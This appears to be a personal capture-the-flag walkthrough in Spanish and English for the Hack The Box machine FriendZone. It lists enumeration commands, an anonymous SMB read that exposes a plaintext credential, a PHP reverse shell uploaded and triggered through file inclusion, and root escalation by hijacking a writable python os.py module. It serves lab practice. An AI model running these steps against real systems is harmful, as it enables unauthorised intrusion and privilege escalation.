echo "10.129.114.131 friendzone.htb" | sudo tee -a /etc/hosts
nmap -sC -sV -O -oA initial 10.129.114.131
- -sC: scripts por defecto
- -sV: detecta la version de servicio
- -O: detecta sistema operativo
- -oA: la informacion se guarda en un archivo
nmap -A -p- -oA output 10.129.114.131 --min-rate=10000 --script=vuln --script-timeout=15 -v
nmap -sC -sV -O -p- -oA full 10.129.114.131
nmap -sU -O -p- -oA udp 10.129.114.131
rustscan --accessible -a friendzone.htb -r 1-65535 -- -sT -sV -sC -Pn
nikto -h 10.129.114.131:80
gobuster dir -k -u http://10.129.114.131/wordpress -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100
nslookup server 10.129.114.131 10.129.114.131
We don’t get anything. However, we do have two possible domains from previous enumeration steps:
- friendzone.red from the nmap scan, and
- friendzoneportal.red from the HTTP website
Let’s try a zone transfer on both domains.
dig axfr friendzoneportal.red @10.129.114.131
dig axfr friendzone.red @10.129.114.131
Agregar a etc/hosts
friendzone.htb friendzoneportal.red admin.friendzoneportal.red files.friendzoneportal.red imports.friendzoneportal.red vpn.friendzoneportal.red
smbmap -H 10.129.114.131
- -H: host
Tenemos acceso para leer en la seccion llamada general y acceso para leer y escribir en la seccion de Development.
smbmap -R -H 10.129.114.131
La seccion de Development no contiene nada, pero el directorio general tiene un archivo llamado creds.txt. Antes de descargar el archivo, usemos smbclient para ver más información sobre los recursos compartidos.
La información adicional que esto nos da sobre smbmap es la columna Comentario. Podemos ver que los archivos en el recurso compartido de Archivos se almacenan en / etc / Archivos en el sistema. Existe una buena posibilidad de que los archivos almacenados en la seccion de Desarrollo (al que podemos modificar) se almacenen en / etc / Development.
smbclient -L //10.129.114.131
smbclient -N //10.129.114.131
get creds.txt
cat creds.txt
admin:WORKWORKHhallelujah@#
Nos logeamos en la seccion de Development
smbclient //10.10.10.123/Development -N
Bajamos reverse_shell.php file de kali a la maquina de windows
put pshell.php
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/pshell
cd /tmp/ chmod +x pspy
Ejecuto el script
./pspy
Parece que el reporter.py script se ejecuta cada cierto tiempo. Como un cronjob. It seems that the reporter.py script is getting executed every couple of minutes as a scheduled task. Let’s view the permissions we have on that file.
cat /opt/server_admin/reporter.py
locate os.py
Tenemos privilegios de rwx en el módulo os.py. Como usuario sin privilegios, solo debería tener acceso de lectura al script. Si agregamos un reverse shell al script y esperamos a que se ejecute. Tenemos acceso como root.
get os.py
agregamos esto al final del archivo
(https://s3.amazonaws.com/chockfullweb.com/Pasted_image_20210306172106_daacfb1122.png)
cp /etc/Development/os.py /tmp/ cd /tmp cp os.py /usr/lib/python2.7/